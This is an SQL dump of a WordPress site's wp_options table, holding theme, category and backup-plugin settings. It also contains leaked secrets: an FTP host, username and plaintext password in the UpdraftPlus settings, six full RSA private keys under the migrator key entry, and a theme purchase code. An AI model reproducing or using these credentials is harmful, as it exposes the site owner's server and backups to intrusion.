INSERT INTO `wp_options` VALUES (12083, 'dp_product_search_page', 'disable', 'yes'); 
INSERT INTO `wp_options` VALUES (12084, 'display_product_thumbnail_image_size-width', '250', 'yes'); 
INSERT INTO `wp_options` VALUES (12085, 'display_product_thumbnail_image_size-height', '250', 'yes'); 
INSERT INTO `wp_options` VALUES (12086, 'display_product_thumbnail_image_size-crop', '', 'yes'); 
INSERT INTO `wp_options` VALUES (12185, 'db_upgraded', '', 'yes'); 
INSERT INTO `wp_options` VALUES (12194, 'ftp_credentials', 'a:3:{s:8:"hostname";s:13:"132.148.10.86";s:8:"username";s:6:"mourad";s:15:"connection_type";s:3:"ftp";}', 'yes'); 
INSERT INTO `wp_options` VALUES (12221, 'can_compress_scripts', '1', 'no'); 
INSERT INTO `wp_options` VALUES (12345, 'envato_setup_complete', '1473549291', 'yes'); 
INSERT INTO `wp_options` VALUES (12348, 'widget_block_widget', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (12357, 'flatsome_wup_purchase_code', '605ba572-88da-4d27-ac6e-076288022790', 'yes'); 
INSERT INTO `wp_options` VALUES (12358, 'flatsome_wup_sold_at', '2016-08-15T00:53:55+10:00', 'yes'); 
INSERT INTO `wp_options` VALUES (12359, 'flatsome_wup_supported_until', '2017-02-13T15:53:55+11:00', 'yes'); 
INSERT INTO `wp_options` VALUES (12360, 'flatsome_wup_buyer', 'visionaire99', 'yes'); 
INSERT INTO `wp_options` VALUES (14525, 'taxonomy_term_261', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (14531, 'taxonomy_term_260', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (14606, 'taxonomy_term_262', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (14725, 'taxonomy_term_339', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (14868, 'taxonomy_term_341', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (14885, 'taxonomy_term_340', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (15142, 'taxonomy_term_343', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (17175, 'taxonomy_term_94', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (17360, 'taxonomy_term_127', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (17366, 'taxonomy_term_161', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (17381, 'taxonomy_term_152', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (17396, 'taxonomy_term_138', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (17403, 'taxonomy_term_137', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (17417, 'taxonomy_term_142', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (17653, 'wpclone_directory_scan', 'a:4:{s:6:"dbsize";s:8:"15.05 MB";s:4:"size";s:7:"8.46 GB";s:5:"files";i:20472;s:4:"time";i:1474567645;}', 'yes'); 
INSERT INTO `wp_options` VALUES (17656, 'wpclone_backups', 'a:0:{}', 'yes'); 
INSERT INTO `wp_options` VALUES (17682, 'ai1wm_updater', 'a:1:{s:43:"all-in-one-wp-migration-unlimited-extension";a:12:{s:4:"name";s:19:"Unlimited Extension";s:4:"slug";s:19:"unlimited-extension";s:8:"homepage";s:49:"https://servmask.com/products/unlimited-extension";s:13:"download_link";s:29:"https://servmask.com/purchase";s:7:"version";s:4:"2.10";s:6:"author";s:8:"ServMask";s:15:"author_homepage";s:20:"https://servmask.com";s:8:"sections";a:1:{s:11:"description";s:185:"<ul class="description"><li>Remove the import limit of 512MB</li><li>Lifetime license with lifetime updates</li><li>Use on any number of websites</li><li>Premium support</li></ul><br />";}s:7:"banners";a:2:{s:3:"low";s:65:"https://servmask.com/img/products/unlimited-extension-772x250.png";s:4:"high";s:66:"https://servmask.com/img/products/unlimited-extension-1544x500.png";}s:6:"rating";i:99;s:11:"num_ratings";i:309;s:10:"downloaded";i:40188;}}', 'yes'); 
INSERT INTO `wp_options` VALUES (17767, 'updraft_remotesites', '', 'yes'); 
INSERT INTO `wp_options` VALUES (17768, 'updraft_migrator_localkeys', 'a:6:{s:32:"8c68da59bf8b0c8fc65b571610c48bbb";a:2:{s:4:"name";s:16:"Key - 2016-09-22";s:3:"key";s:1704:"-----BEGIN RSA PRIVATE KEY-----\r\nMIIEpAIBAAKCAQEAxLQSgusQxHCbTvFmCD4Y3R88ieRBl8Id7j4NTu9mH9vPVrZ5\r\nEbvFa2Pg0/LMDoymsUHsdxDX6sV1pjWwhJ5gqTPsRzsZ4psmkpc7UOPnu6Gju0s9\r\n98gkLwqvOvkYnziyL7nRJVYvGZbxB9LRCEUgPhg4/Q/1qdsuNnKa63ZZ2ZXSfgyC\r\nqnVoZMnrPAEW7DR+q5fH6YG0TgApLgZsVWcRxeQaVll8St2cq0bbZV7EG52G/NAm\r\nmLMoXiPTmdUkV7bMEcIcV9caRR6z9kZmFuebgrc0l/ceL7s0elaZUVlm98dkfG0K\r\nwx1SGsDLmy1ok9EKPe5oSNfG8m1ZF0wmeN8gnwIDAQABAoIBAFZnk0oW38KqhE5l\r\nE6DDRkC7m+gmb/mtt2ATudzWpFGSSL2aYgw8IzhNI1F28dPiTMbIYoraxz3Fhyx/\r\noQ5gU61/tWaEu5Yi+Qqji9a4he6Rzk5TeuEA9YQEeXy6NuqaCQuV4B06gm4HM9Fv\r\n9Ypgcw1TrpTbEdqPAPnB1fNghY9hzvGmWmOIqhqdby4VkM7TQ8uh/jGd577K2X4F\r\nmrFtYyt246yenYaGcC0iRxXmrSFirG8JLmHEsbt1ZntSAH8Dnv89F4DOSdIumkLb\r\nV6v/BqAei7B2+rktC7MojB8LO5aV9WX+G0WHphqdJimqpIc2VBicp5iVHdvdS0un\r\nzL7BmEECgYEA8RRiW9ClKy2brXhM6CduSIBSyW4BiGsRZ5QqlYU33MgmqVQtvji9\r\nJeLZ6AL34w3ty0KLZGziFwd7GwqDaCQTgSpaMCc4wVFrlhGrnY6hXzZ3ZIU0wUOt\r\nLA2U8KBUVS5a4sZBncl7pF5erl2HZAvo2VMf/YntjekYRF8IAvyUgfkCgYEA0OCZ\r\nt8iI3tF0FeT0nElPECdylDy307OHopyI2Nlulo2alxK57wqD2/LpDcaoun6fyBdF\r\nUKPNw52qTenXciKZPm3KQBVkKqKYb18qdxUAmdsEsk9GukHjYFFCJUM4RHVbd/c7\r\ndOkZ1rFc8xm3G4dG4rUWn3xSI0I3h4hTSbyL3VcCgYAWdRiohuor+IatBSzc33d1\r\nh4auvvGjnJ21cWb6ILvQdFCtq2rLcoukMNqts0EWRKDnM166zy3MiWTdYwBUvi+W\r\n87QNEkpGL+h+xUygU74SmYdLtODyM/S4ytcaB0Vz3eqXf3JzWWaMLEJTqeDH4Bgj\r\nzouHWcboVlNtYxDi/lZzOQKBgQCUnHhBziezgIp7WV7AI1hhQe+/kEOqF72U8JJc\r\n1rZb33vxqJ0pee2+++DcsE80AQtlrUjfyuuHFhIpRQrIZd1qEWsolQ+jVfPmqWrp\r\nNsQqsy1wP/8uXdqMmMPbByxtaKIfhIOE9qQvoBllzRH+QA0rF3R1HFrEQ0SG5XN8\r\nru1EGQKBgQCUd1S4yytABLZWrQ3MpFSeGkc0u9QnsJIP5syMk3vx/yj7HiivZaSl\r\nphYFfsT8sL61K983OkVzUqQqu175jzPWqBSWo3X6PUQHxoa4e3SaCgUovdUwhvMC\r\nHyp4miBVK80kveIhTev1HPneas2ML10uSDF/0VCHbcNhcfko6UnwQQ==\r\n-----END RSA PRIVATE KEY-----";}s:32:"7a663caea1b722a63dc2868158ed584d";a:2:{s:4:"name";s:2:"MS";s:3:"key";s:1700:"-----BEGIN RSA PRIVATE KEY-----\r\nMIIEowIBAAKCAQEAwzeG3UZOg+47A5XR+VxQ8DBQ5NC2gBn1yEx9zh7wOC88bphq\r\nmuCjMBk7c8ZXX9u6IgiajU2vqtz+QpXPzH5fBDouiz0/ltkbsf4WuaM8pht7B9Dg\r\nVtPLLmY52tHLUmyk1ZGfarMTa/5lW12uCdnxtFLtx/Q2gfIOD1AnBPPJH5mtK9bB\r\nisIfUKtUEPZFxKX8J3QZ8l9mmPr0thwmRlzGSXKGKyIVfUHKxhoSrwPNZjTzv8Bb\r\nmox4WrrN92oHKgGCff9UtXsC7l58MTkB4zSan4neIwyOCWPQwGPpp3EqsmBHeVkL\r\nYYyK2KMTnULKTHQEBZxggiYiPUnUxurYMJP3+wIDAQABAoIBABvHlQt768RebEtw\r\nUHb5qhLj7T8CbFYCW7VrHSPtxyVXo3PhgJoViWNY09r/yIM9k1kwfD3LZkocNJpp\r\nEy74dLD3TpRF3PysXIKRs84q6oCAvJs6IBJ7BRjPN0BqRlKuXy59EIBwhz0A8I91\r\n30RLnVeZzXh8yhznwxRuxX6w6lfymDwe6LPyO8Iz9aDbWJFMGdp1K1KJBjOufnyb\r\nUQu+cAorfdR6HtcughLnX/KFLRXvY/pWMC2BjECHYi8ClNCpUtgnydtGw3hkjB/F\r\nkLAr/2zGAzdIvAykNaRDn2n3sQD3LcAr/a++hdPj8cwMKt8H2h6yTK+Ex4WwWVS6\r\n0xrFkDECgYEA/8mkIjMmN0guFx4ZMvGn5GsDWSR3aSlBKgEkFWDeDWG8pvt2kMD0\r\ne0hrTWuOS6mo1CyzqUQ3Wj2ZQROw7H4pM7xPpJT8QKrPKv5P3r4hlZfrwVHS3HFQ\r\nz4IT/T2RiYE+hglWpLk5jw5Hsvz5dwHYErVNYFL7h/8HZsn6L8e2EP0CgYEAw2ED\r\ncMNoTueAe1kPpwmLigXsgSDLzlAHeJnMfBZs4rjywZiH6C3aiNKu94AJv5Qgr5XY\r\nTsGriY0xSYQe5OPI1t5hurGGUIift9qHnyv5EBkzfxur55QBJ40BJoJiNfQh9J9X\r\nK8G8u7XiqQowpmCowfl/7w9y4KrbFE5oZmAsmlcCgYB1eJOKqVb5uIqCT25fOSBU\r\nBNmKzPaSM0IcGl4J+2y/VI2hWoc/P36IR+APtD+rfAVvPABe0ldheDyz6Gkuk1o0\r\nyl0BRvL6d/eg1R61OziNTTIWnI9schYc1q57dRUrw1GFmTBTgkVu7636A7hF8XDc\r\nVqtse2/NK1Co4kWmP9/buQKBgDSKajpw0iQl7U8+bA8nafb8ENXI1AXvT5MHCQ51\r\nmWJ/Cgk105aEfjg9MAAu1nBGjWOqkDjdrBuZdJ+ogAZdmyztMKrcApq1ov32LnKH\r\niLrjjA2qi1gDXSwdpymL9o070cXO88o4l2CDUSjULLERXVCMn/LR3Lq+N5wGWdzu\r\nEBCRAoGBAPGxSdOtsqSzvy94XxmhSmhzw859s+wdbX/ECYY4ODWEUvqnl0r3Ugvk\r\nDt34SoElzDcSWqqj3x3ygOQeKx7PGEN/o4WbWudx1qPsRhRti6MwuPmHsWWhZNu/\r\nLLcesy4Tc1hzhmFd0+mGTcY0dTDeEFafZ2QoxwWYDjHh/oJC8zgD\r\n-----END RSA PRIVATE KEY-----";}s:32:"f0af962ddbc82430e947390b2f3f6e49";a:2:{s:4:"name";s:6:"miller";s:3:"key";s:1700:"-----BEGIN RSA PRIVATE KEY-----\r\nMIIEowIBAAKCAQEAw7WAN+dm9zq+4CSiKRczZIBlkVXuUUssEZJsxsrPh75PhPml\r\nOjXLaRgzJm7QiZQYQXgpMGujQ4WvT0qPlkdQyGJ0UJ3n9kR58y2IlhCnopKuB9tE\r\nSGtEJBa8LaGhPOBVymLN+sC7d+6/8QlU/iFPH6DLt0Jj+DhC1PhLC0W/0SeBInSt\r\nOLnD7gNfq1JppoDXodMHk2gST5iaAvcivv7GjmfCYExhdXy/V/c7RFMVd5s24L4x\r\ndLuHp0gC+3zAZA9gXhckaIHuRaBQe63IiASfZ78uRSuU7B5A0oWrMFQG1Vq+Cp5O\r\nNLSKakrUvFfZ2+9FjWdWxDZy0b+uEL8NQg+ZtQIDAQABAoIBADTZtNBj+xhUkusw\r\nuWHjVAuV6NfAnuTxKets4VclublsmUjNqeL4V///ewCr+EDO72XuryDWUHaRiXAe\r\nMHxisdwLSmHi4ptMjqou562uvbZXagvRGLV90h70zMh91277He/TktBeb8HJhafv\r\n3zXphNaDs7+/fAOyHcopawqWQWCXkzR/MRTTAHGYc7b2xHtB2itP+nB/7EUEXCOB\r\ne2L74j7djq6bGrzY9PolWESqIEiKSnPtteJniH1+FFlGziHn82T+MtM7MYGssKEB\r\nkmIjPQsph98SvZ19fIkiN0jcR9ypwYgC2SA7X+YXlJARJk0m/w6QUtA8b0tRFZF7\r\nzgYq61kCgYEA8du+kKmWB/dWnOMxVuCr/PBDc56E+h00qaX4P6SMTSdl6yXdLCdX\r\nYx8AyRJifjrxE1TvUD6S75dySxJB2WHVpF3xHIWSn5lJAepqHhg0UAs97p5iP0eq\r\nhPH2BEC70RB4U9xz78dui0uittHVMXpfwx1GG3wI7QlSzze/8+tnRusCgYEAzyb4\r\nOOj+ket+tu3RWcuOA3BZ1HaTAXHEOsXQWuUccrVwVIzFkr/QzQhp7Y08k2Ex1ZO7\r\nh0RfHR/LvWrC2idP9mzYAnweMR+Q0KPr0JILDKS0lYkREg8ZtDOqZ/gTyaxxuvSt\r\nLE4FoDVumEtXuHYynOLf2/M4yHhBWOT0HN5Lud8CgYBp1WSwXOVAGyWVhX1jrPDV\r\nwDVj9Kvv3rPawLu+7bxPTrw0h98eoSCGSVzIn/jlj9lKQlJuZNNbcIQdAaI7A6q/\r\nQDRv7Ktal3LxGajR/nl1xVWWg0wusKeXgWHMPp9xPqnI2KEK/dQLtE9BfNSzz/7z\r\nnG2/PSmSwA+yiYy/qfUJfQKBgQCwJcMNIZLXIhkuFCvg32ZzJiY8tFds8wCZuXvi\r\nzs/R+tb6Dnoyv0keD/mDNoY8DHoD0wuzikAW0+K7vvzR5HvqX8OO2VwTCXRq9fif\r\n8o/SwHuObG9Hm++PfB97KUgqRaiwAT8AXZgLE2RnvClrgZaoMYOJ1NiEHz3yCT5L\r\nDfv2oQKBgA3zRove/rIgqpV9MJss5a+ws3uXiOzwZ5PeGoXDPydqe+8l7JtHDox4\r\nm8hFwoKS0HDZ8pOjOuWFM98UpDuSRwMe8ktRJc/rE1cdCuVTbAZ1QUKkkTGxnSYz\r\nfwWuaglpCa33TepMSvFg7AJiDD+0TkJ+Oa02Z0aMKtRsUljwJHhR\r\n-----END RSA PRIVATE KEY-----";}s:32:"1aabac6d068eef6a7bad3fdf50a05cc8";a:2:{s:4:"name";s:2:"dd";s:3:"key";s:1700:"-----BEGIN RSA PRIVATE KEY-----\r\nMIIEowIBAAKCAQEArEjkvEp1xRldy/kBvTaCF+h57HwvlnLyFB4SLvFjfRTRkffW\r\njXCjTlM0wdtorhY8NNQEXRSLQPYob4JSxcNtJGXT/tE8cwblKg+2B71IbIPGYhDj\r\nTKN7iAkC8Q0VsHmloBOto2iEXqpASuaYPFSurXcIybg/4WXG9SbUpP82j3mlMgWH\r\nuGWB1lEc13++jp9mS03K2gVpUE2UE4VlI4K4DpSliP5+oPW8h+dX5gfwmzBgSOIu\r\nqfPOJE00SYjJo6ESmj4zw0JVT+VtFln1qQoJZsEyTX9xGLvMmbb+1xQcA6thurDW\r\n/HSutcrSIaVVrAHOTUIPxUY3hFnhiETioPQhOQIDAQABAoIBAE9NsnR1teZHOeTF\r\nNya4q4OD0HOp6mHPgVz/RpFzLb+K0LjnI0yx94n7RQKjE3lm5MnQej26UitR4+UI\r\nUT+VKG0jrkTSXYf5OY118+12FJtWwP+tFGPXsOo6c68vvbchF7sqs7fPSXcl2Thh\r\nEtxagpl4fIQWGtmO9tkryaA1lhDORUfrLtjERWFDplq3yHXKiedFec+nzYycnuKM\r\neojw26RJahyhkgnV5F4sTcXnpeBn6Rxk5h9Fmfi58P2KKFYkXLyx/7bg30KVX1WK\r\nFenoh6QUgc9/gea2JKOKCwK8G5QgabNVBdxSjm2mhJcxKUNgq3qirveWhiC6CZDA\r\nmkAEdwECgYEA3JqRTVxl6HfrVSsbLkx8wNp2PiBbqFq1DK8sV6ngRdh69Q3Hp1rz\r\n4QSEOVPFezvSoQzcW1uSHHITU14AIbv/7tgtmGHSq3tHIhJTiSuXupGPFWN8mVAF\r\n3L8yuWHv6jkvs0njIGO0ciTTYE/LGXY5xhp3RMSXZKUbyO+TJMP+MmECgYEAx+2X\r\nqM5qWlix1ejyzCPMLPCa+9dO7ONqywh/8ZYVyMBUcZcpYFQ0gDGeMzdaXZxqvko4\r\nS9uxxE/Y+EULO4JmwaID39SavwIJ/aG8T5Yg+PlLWf0NG5GvvTYVl0yi4XfUIijA\r\nIBnyuyBJ5uV3SJHbJwRuZlab4ppm5znlDG48jdkCgYB0WxZ+rliWCAJZVrYscm1u\r\nrwuk8x5FKyrJeO+zgUdor6kS7eS70c5GhkJTlmrX+BK9nXHwwdjMJiMpWrBJGscA\r\nLIfIEviyOACp6O6ksBiEcFf+2Q2UM9ATwck4XH7VlLojH7qrj8tSVTgkWZHvaRtJ\r\n8RWtcN/FVwzTrAF5Z+MAoQKBgQC/+/rXwifEzEkxZbnJqFKHkSDy16XVuuixQV9D\r\nSWFv3qj4TzUPaKzlsT/+ZJglLnAefT0kMzq4jgiHGB4aLjWomYDo7ssOwtF/OlGP\r\nh1XwX8wpBOQSZksBAi+nk5MRujT9/G3KJcC+StpMnGt4R3/QLuQo5+BXsPdB8Ylu\r\n72i8uQKBgG/yUEhKaBtBVKQHUsFCCKzYGOA0VnJTrqmP8qfm9ESp+fV4+sDqpHcP\r\n4m1qZ3LVdSc6GChvS3MScZcYuMGXmIMclCh0wecrtqRBK0sm/GQRSLNc8OsGAF4f\r\nArVai7JI5s3ig8LImJnicSpMLqy2t0n+oV5GFsDjfYKogo1xMqoN\r\n-----END RSA PRIVATE KEY-----";}s:32:"8546f9c88ab637678947a81775464b17";a:2:{s:4:"name";s:3:"dd2";s:3:"key";s:1704:"-----BEGIN RSA PRIVATE KEY-----\r\nMIIEpAIBAAKCAQEA3qUVegZUWaLydDR8NwfKZucTkepDfrOiRkP2YgXUe72eRyHn\r\nM1vxkdlfRKvg9cc0mG1nH+f2QpLNmTNTJNdttZGqR036uQSkVXWbardUz3+mWvMs\r\nbDjD9pmF7AK3IuRM0OlAASqmirf/+ocP4h49FjRLWw4tyclWrWN+5C2XDzVdY8/x\r\ni2tB9wBfgygFm3+BTSPmPKUH631vLSgR1I0vyAPcXiNMAX1kTMV3t+qDVb7uaLiC\r\ne0J1lg/D65uLVPkTU7nTwUGc0R0M1VnDM0v2rJRsNviPlzdZwoYH9ItWDGKnXWkl\r\n8Mzex8dvzEh/Shzb7i2U7j6knfB1zfYz98yTywIDAQABAoIBAQDI1adK3FzIQpls\r\nQ0/tIATuz/CyRdw+dXGi6nlcsJ+cQ058IdP5Wy3Mf4VVX6ncaqZB/SXx/P8BzITT\r\ndh3A9OcMyuoLygapUMugHydjmx5Q0nfQQNzIfmgekRvh6g0i10eHh2/p3Xw/U3z/\r\nk0e7k8VMuz1iVKbvB8Q9QavbzlgeKTlqrZFLgj378tib54cbDPliOmUq3xJjOocv\r\nvOSc8ZhdlXJ+Vqjw5tCpNrFJkfjA/wtxMiEQeLTfD/YA1ssCSeXQZdwZmILp3zEX\r\naUnjRca7B5ONhaJBpbDYAlK1FRE8DoDtZgEJKw8nWA8DY1YKyGsPndJlvXrOk1au\r\nsRREIbiZAoGBAPDocUEEBuhhyLb9DOA5xvENROqO9MJ8m62Soq6MkpKL8wpSaIvH\r\nWAVCBh9Oh4It34ebHT53ZVf0EBRVvK1o/bvZGtl/fccTGB+allLy3tuavm92yDCQ\r\n3e3V82W04UwlVRJspWZgqR0Qp01MEOvMriwDx+EMqIlLcyaxlXy/jyDvAoGBAOyX\r\nvz18vKUCRluKBkKu2WqS/VZlD/06EHvYFxvC1NWg6+LeziiUHYbHDrgmuBu+mOe4\r\n6dS3jNd7PPXwGpncUbTpCw2tP0DaWkHdUPEH5yqlnjNcZgRgGwtf+iPffLK0hdZC\r\ntp3c+BnAIttnCMnmn9Vgsg5e/Io0wry1bZGJIcLlAoGBALQZ4klr3EowiGCdL9oV\r\n96/Qbrw4oa0ggTYzUOHTf+SFMe5+i2AsaJaNtIwFJnNhHiKACU3g7ufhM4AwVL0D\r\np+Weul7t3DdPBBLkfAuJPKjKuCIWmDUOqIudDrjzkBdgNYhvpvuxudxbzeeQvXm7\r\nbF7FeNG7p+f0eyLrUkmP4E4LAoGANFiOs2f5xPhv4Kj1IaPV7sJ+0rKhiwFhzETP\r\nOBEvTeTAy/1H16qNrdg05YGLknflFL/Q3IOP4c0ee7uX5xrb6Q72pxwBtrOY7KGu\r\n2uVIvCLQkcSLvcQVt7qQeYdk65UNV46DIQJW0ju0ep6dTy57hpZSTuOtNFbgDyiF\r\nCYIxuhECgYA1oAMaWwQVQCNPYmAsO6d0PvR0BXi9x2S4diJWSw7flcjSj7vc8qGa\r\nyjfz0wZ2CGmyVti+qupoGDpwn+51WHl/axu+8olJ/ddbnAiWllc3nb79t7eE2gv+\r\nsuGwQtN0gQaDrTo7xdbRHd7cfniyKUKvXMCoKhfuB1WXul9JxoJRsA==\r\n-----END RSA PRIVATE KEY-----";}s:32:"9b015d167f5b2a9b11c9da5e1f2fdfd0";a:2:{s:4:"name";s:16:"Key - 2016-10-19";s:3:"key";s:1704:"-----BEGIN RSA PRIVATE KEY-----\r\nMIIEpAIBAAKCAQEAxvFCRULlVvRBr5av7/51NUjw90XDiDcQoqGVNvzvkOQ4DUXC\r\nvF7If0N4ZouwG7tvnvJFx0dKMFMcHnb+XdBXsmvE/Udf2JPEXWYsvACLhGS16dNw\r\nATAS9eUfBV6PUEK+yzwe4+TkokUm5P+sv2sDZ7hqTmKcorQ380/ykO/W3zP8+iXq\r\nydRhTHelMKglI9q9d2A7RYAeuOSDXzZBWt+SqKLXG4RxyIZa5T3wkNe0RadOdOty\r\nTSX0KF4IVhs+e3L2W6mGARzg+4ZBOOBBQ5MS8nFdVhMTHPxMnrDvd2TLPs7dpn6O\r\ngSyCQNf4mKdPgK4g95YNnLsqeu4x33YArOf0cQIDAQABAoIBAQDDih85NKd28F4f\r\n2FzV56YM2cT/RvMJ0BXpxCiGA9b081ykrwzZWdB4RjjxkhtnJrRv5nHvjYK+PPJG\r\nf29FhqKsHIFi8eSjW5qGswcFQwPe/Z5QViKhCD+asbnr7SWwHeqqmE1EcpbHaHDy\r\nZNvGychvCjRzFzoeMkVMQiiJjTQF7beg/MNRh4PEauA72hCdhgItltMk/pv+8QSy\r\np05YCp68Y1aEv410GoDpYn6FGajR9Oji+CBz5JvV0tp6EukLAec+uFGMUGYPpVIS\r\nQNFwDqZQ9wjAAL8n+MwDhfaUUr25fw+xLDIy6S4/MVuQYm/5PY44cPu/R7AP9oTa\r\nV+5anfKBAoGBAOqcwFxcmwGXZ2YgxEABQZF3o+uZYbtK3Ok6943LjOMUxCvs0gDr\r\nMf7A58m4zoW3YJ1uZJTaY+a+MEJ/6emC0AheG+MXyqaVozPVAFu6RgM6ducmKURz\r\nIDQ2sB4MK/xrMqlSxgTS7m/KHquWbkngfWh6KvlTEVj8xh5astBEQOenAoGBANkU\r\nEFVE3fqOmVIcgMcHSxau4ZHyP3MU9OSmjMgqHvaDM6wq69nU54sNr6Z+6x0WO8Zs\r\nQvDbp+tau4Ge0a9mV/O19NYk1KKNhRB5zO7hTf1oQE4JNwE+biNbmI8vKLZcVZYv\r\nnrVN/ZczEbUHkmxmJT7TIuRHXE8LzTEVPoNAi0YnAoGBANaO2kDdlAiljTNSHggm\r\n3e8KCkgpcr6VXWiSu9jaYZM+55UANKIQdh10D8Zkk8KoDNyNG8Eh5KEeKAZ48tPS\r\nBSzR3BEYLgWg7as2TeiVdvf23MzSEoV9/+KgbPpdyVBEPQWrJFs/CD4GC3yCy4QW\r\noLoOmASCGmhWa11RNxzOfskbAoGAQHDbVGTIPLweOajqdartmIM7xTaTrVcYR9RF\r\nUJpobKeQLFjlgNnaDoZ2kUd2BkF2ZzX2PUgHti9OIHGEL7yC+X8XeoaedM7sJHLz\r\n6ioKG+LZzBCiOoVM7sQfKspGHLSWV6o1Q/8t+7eWVxYzWmiMP/Uvk3K3rWOEe0Ci\r\nORZtAdsCgYB1GsydDseq3ZDYQIEhfeLl28kvcqp8P8AxURitSHtsFlxxx4Ih/OpL\r\n8LRkFKoHCTfjymm0oHQ6LtGs9l4ui/rz2kSY6xa63XPylLV1V4eEggU8unrgKYBI\r\n8muZdUGBKaX4iriXAD1kllOLaI8F8Xv+JcS2P0BrNQrBpyTp5kKQCQ==\r\n-----END RSA PRIVATE KEY-----";}}', 'yes'); 
INSERT INTO `wp_options` VALUES (17769, 'updraft_central_localkeys', '', 'yes'); 
INSERT INTO `wp_options` VALUES (17770, 'updraft_autobackup_default', '0', 'yes'); 
INSERT INTO `wp_options` VALUES (17771, 'updraft_dropbox', 'a:0:{}', 'yes'); 
INSERT INTO `wp_options` VALUES (17772, 'updraft_googledrive', 'a:3:{s:8:"clientid";s:0:"";s:6:"secret";s:0:"";s:6:"folder";s:11:"UpdraftPlus";}', 'yes'); 
INSERT INTO `wp_options` VALUES (17773, 'updraftplus_tmp_googledrive_access_token', '', 'yes'); 
INSERT INTO `wp_options` VALUES (17774, 'updraftplus_dismissedautobackup', '', 'yes'); 
INSERT INTO `wp_options` VALUES (17775, 'updraftplus_dismissedexpiry', '', 'yes'); 
INSERT INTO `wp_options` VALUES (17776, 'updraftplus_dismisseddashnotice', '', 'yes'); 
INSERT INTO `wp_options` VALUES (17777, 'updraft_interval', 'daily', 'yes'); 
INSERT INTO `wp_options` VALUES (17778, 'updraft_interval_increments', '', 'yes'); 
INSERT INTO `wp_options` VALUES (17781, 'updraft_interval_database', 'daily', 'yes'); 
INSERT INTO `wp_options` VALUES (17782, 'updraft_retain', '20', 'yes'); 
INSERT INTO `wp_options` VALUES (17783, 'updraft_retain_db', '20', 'yes'); 
INSERT INTO `wp_options` VALUES (17784, 'updraft_encryptionphrase', '', 'yes'); 
INSERT INTO `wp_options` VALUES (17785, 'updraft_service', 'ftp', 'yes'); 
INSERT INTO `wp_options` VALUES (17786, 'updraft_dropbox_appkey', '', 'yes'); 
INSERT INTO `wp_options` VALUES (17787, 'updraft_dropbox_secret', '', 'yes'); 
INSERT INTO `wp_options` VALUES (17788, 'updraft_googledrive_clientid', '', 'yes'); 
INSERT INTO `wp_options` VALUES (17789, 'updraft_googledrive_secret', '', 'yes'); 
INSERT INTO `wp_options` VALUES (17790, 'updraft_googledrive_remotepath', '', 'yes'); 
INSERT INTO `wp_options` VALUES (17791, 'updraft_ftp', 'a:5:{s:4:"host";s:13:"132.148.10.86";s:4:"user";s:6:"mourad";s:4:"pass";s:11:"MSRipyak99!";s:4:"path";s:0:"";s:7:"passive";s:1:"1";}', 'yes'); 
INSERT INTO `wp_options` VALUES (17792, 'updraft_ftp_login', '', 'yes'); 
INSERT INTO `wp_options` VALUES (17793, 'updraft_ftp_pass', '', 'yes'); 
INSERT INTO `wp_options` VALUES (17794, 'updraft_ftp_remote_path', '', 'yes'); 
INSERT INTO `wp_options` VALUES (17795, 'updraft_server_address', '', 'yes'); 
